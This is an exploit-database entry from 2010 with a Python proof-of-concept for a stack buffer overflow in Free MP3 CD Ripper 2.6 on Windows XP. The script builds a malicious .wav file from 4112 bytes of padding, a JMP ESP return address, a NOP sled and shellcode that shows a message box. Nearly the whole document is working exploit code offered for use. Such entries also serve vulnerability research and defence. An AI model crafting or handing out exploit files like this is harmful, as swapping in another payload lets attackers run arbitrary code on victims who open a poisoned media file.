Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit

2010-08-07T00:00:00
ID 1337DAY-ID-13600
Type zdt
Reporter Oh Yaw Theng
Modified 2010-08-07T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            =====================================================
Free MP3 CD Ripper 2.6 (.wav/.ogg/.flac/.ape) Exploit
=====================================================

# Exploit Title: Free MP3 CD Ripper 2.6 (.wav , .ogg , .flac , .ape)
# Date: 7 / 8 / 2010
# Author: Oh Yaw Theng
# Software Link: http://www.exploit-db.com/application/12012/
# Version: 2.6
# Tested on: Windows XP SP 2
# CVE : N / A

#!/usr/bin/python

# User can replace the .wav extension below with any extensions specify above
filename = "crash.wav"

# 4112 bytes are needed before overwriting EIP register
junk = "\x41" * 4112

# JMP ESP at SHELL32.DLL
ret = "\x65\x82\xA5\x7C"  #  7C A5 82 65   FFE4   JMP ESP

# This piece of shellcode will pop up a messagebox 0.o !! wtf ...
shellcode = ("\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"
			"\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9"
			"\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C"
			"\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0"
			"\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B"
			"\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72"
			"\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03"
			"\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47"
			"\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F"
			"\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72"
			"\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66"
			"\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14"
			"\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72"
			"\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F"
			"\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01"
			"\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65"
			"\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B"
			"\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42"
			"\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24"
			"\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57"
			"\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01"
			"\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F"
			"\x63\x68\x45\x78\x69\x74\x54\xFF\x74\x24"
			"\x40\xFF\x54\x24\x40\x57\xFF\xD0")

# Building malicious data
exploit = junk + ret + "\x90" * 5 + shellcode   # left 265 for shellcode

textfile = open(filename,'w')
textfile.write(exploit)
textfile.close()



#  0day.today [2018-02-17]  #